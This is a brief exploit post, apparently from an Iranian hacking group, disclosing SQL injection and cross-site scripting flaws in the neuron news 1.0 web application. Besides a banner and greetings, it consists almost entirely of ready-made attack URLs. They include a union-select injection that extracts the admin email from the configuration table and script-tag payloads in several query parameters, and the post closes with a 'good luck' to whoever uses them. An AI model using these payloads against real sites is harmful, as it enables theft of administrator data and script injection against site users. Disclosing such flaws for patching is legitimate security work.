####################################################################
# #
# ...:::::neuron news1.0 Multiple Remote Vulnerabilities::::.... #
# (sql injection/xss) #
####################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : virangar security team
(hadihadi & black.shadowes)
---------------------------------
special tnx to:MR.nosrati,MR.hesy,satan,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
------------------------------------
vlues:
1.sql injection:
http://site.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/f
rom/**/neuronnews_configuration/*
########################
2.xss:
http://site.com/patch/?q=viewtopic&topic=<script>alert(111111)</script>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</scr
ipt>
http://site.com/patch/?q=newsarchive&newsyear=<script>alert(111111)</scr
ipt>&newsmonth=<script>alert(111111)</script>
########################
g00d l0uck
